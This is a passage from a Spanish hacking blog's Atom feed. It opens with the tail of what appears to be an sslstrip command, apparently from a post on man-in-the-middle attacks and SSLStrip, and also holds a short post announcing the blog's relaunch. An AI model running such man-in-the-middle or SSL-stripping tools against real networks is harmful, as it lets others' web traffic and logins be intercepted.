-a -l 8080&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2008706321168476881-4815567536616421270?l=btcode.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://btcode.blogspot.com/feeds/4815567536616421270/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://btcode.blogspot.com/2011/01/man-in-middle-y-sslstript-teoria.html#comment-form' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2008706321168476881/posts/default/4815567536616421270'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2008706321168476881/posts/default/4815567536616421270'/><link rel='alternate' type='text/html' href='http://btcode.blogspot.com/2011/01/man-in-middle-y-sslstript-teoria.html' title='Man In The Middle y SSLStrip, Teoría, Práctica y Script.'/><author><name>RocKHounD</name><uri>http://www.blogger.com/profile/15257148657067649155</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/-Us6BLqK9NNw/TX1JKk7_gxI/AAAAAAAAACg/BnQgIJA1rJc/s220/ROCKHOUND.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_qLl8Ru54qEE/TTa-e8M3bII/AAAAAAAAAA8/RUIzrjtI6DI/s72-c/ssl02.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2008706321168476881.post-894302372214050918</id><published>2011-01-19T00:58:00.001+01:00</published><updated>2011-02-09T11:19:23.785+01:00</updated><title type='text'>Vuelvo de nuevo...</title><content type='html'>He decidido recrear el blog para que este algo mas vistoso, en breves tendra temas de interes tutoriales, video tutoriales, scripts, etc.&lt;br /&gt;&lt;br /&gt;Gracias por la paciencia.&lt;br /&gt;&lt;br /&gt;Podeis encontrarme por el siguiente foro:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://comunidad.dragonjar.org/members/rockhound/"&gt;DragonJar&amp;nbsp;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;ŖøĆқҢŎūņÐ&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2008706321168476881-894302372214050918?l=btcode.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://btcode.blogspot.com/feeds/894302372214050918/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://btcode.blogspot.com/2011/01/vuelvo-de-nuevo.html#comment-form' title='3 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2008706321168476881/posts/default/894302372214050918'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2008706321168476881/posts/default/894302372214050918'/><link rel='alternate' type='text/html' href='http://btcode.blogspot.com/2011/01/vuelvo-de-nuevo.html' title='Vuelvo de nuevo...'/><author><name>RocKHounD</name><uri>http://www.blogger.com/profile/15257148657067649155</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/-Us6BLqK9NNw/TX1JKk7_gxI/AAAAAAAAACg/BnQgIJA1rJc/s220/ROCKHOUND.jpg'/></author><thr:total>3</thr:total></entry></feed>
